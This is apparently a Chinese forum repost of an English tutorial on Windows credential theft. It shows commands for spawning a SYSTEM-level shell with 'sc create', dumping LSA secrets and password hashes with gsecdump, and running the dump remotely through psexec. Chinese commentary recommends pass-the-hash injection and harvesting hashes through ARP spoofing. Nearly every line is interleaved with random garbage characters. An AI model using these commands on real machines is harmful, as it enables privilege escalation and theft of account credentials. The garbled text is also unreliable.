o get a DOS Prompt as NT system:
% ^6 y$ R0 D# B7 N2 z1 P% k
, ^& u. `5 E$ C. g: zC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
; M; j- w$ A) {& J1 y2 V# s( s, w9 x[SC] CreateService SUCCESS* \) p5 S4 K% O1 r3 T9 r: x
2 f; n [' y/ N- d& F8 yC:\>sc start shellcmdline2 ]3 w+ T3 S4 P8 P3 c* G' p& |
[SC] StartService FAILED 1053:
& w! \: Y, T Z6 F
9 V8 e9 D) n2 h. u( {The service did not respond to the start or control request in a timely fashion.
|% P$ _: C1 v% \" ~7 A, m- j! } Q9 r
C:\>sc delete shellcmdline! z, N8 c9 n! L" i
[SC] DeleteService SUCCESS4 Z2 n( y6 R; x' b3 m
6 Q2 [% L' k; z; [, u/ B------------9 k0 @9 U) _: A3 ]1 w6 \
, D7 V* D; v; {, U& p1 F p% @
Then in the new DOS window:
" h2 |; @1 U1 X) S" H h3 V+ `( d% t% H
Microsoft Windows XP [Version 5.1.2600]
3 z& |5 H8 H+ `3 a9 `' _" `(C) Copyright 1985-2001 Microsoft Corp.6 W- P9 |# L k/ Q
( X: q1 b+ z! B7 y7 ~4 ?C:\WINDOWS\system32>whoami
7 i) k' }4 _" e' e3 mNT AUTHORITY\SYSTEM
{; a4 @+ w* d: K2 |: I2 h" {8 @6 H. X: a* w
C:\WINDOWS\system32>gsecdump -h
7 g) U0 }) t2 I( igsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)8 F% z7 n, n& B/ Y, h, e" K# K
usage: gsecdump [options]
0 G5 R5 j* p7 b' v0 h T7 o$ W% Y" g1 Z. ~
options:8 [. _. ?* c9 [- }1 \3 v- s
-h [ --help ] show help- B5 F2 `, s2 r$ o# k% X( X% A
-a [ --dump_all ] dump all secrets, O7 J# w% c7 o( ^, |
-l [ --dump_lsa ] dump lsa secrets
; ]# }( d( b5 A5 [ J' k3 D-w [ --dump_wireless ] dump microsoft wireless connections5 a8 M* E- |& e! {, Y
-u [ --dump_usedhashes ] dump hashes from active logon sessions
, _0 z1 X9 G* ~+ b) v9 n9 M-s [ --dump_hashes ] dump hashes from SAM/AD
6 V) l% V/ i* o6 n7 ]- g% M. S# l. W" |% a: l7 S
Although I like to use:. ~& n- _. C* L6 E: q4 Y
( |* U/ n( [/ ]8 J* O _( j* T% dPsExec v1.83 - Execute processes remotely; a2 F9 p1 G9 ~: G: P" U
Copyright (C) 2001-2007 Mark Russinovich2 f0 J" D% [+ V/ [! t; Y
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
4 F8 n+ U! E: b* N% {; _ U- c) y6 V* j: m( C, d' ?
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT1 x, k# i2 q) ?$ z# S
) Z6 { u# K7 k; k' n/ y; xto get the hashes from active logon sessions of a remote system.5 o2 g* c- x. O' }; |
& O# ]: x# _$ r) {
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
: q; r4 Y) ~/ J8 ^" @
: q: g5 s8 F6 E9 n% d& c2 s5 [+ D提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.' W2 B$ o8 i2 o9 w& B7 i
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]9 Z1 @- ]2 M* Y0 V" O
+ c3 H, G' ?, X# D/ t1 p$ y/ E我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。 @) J) Y* O. ^5 i
|
发表于 2012-11-6 21:09:29
收藏
支持
反对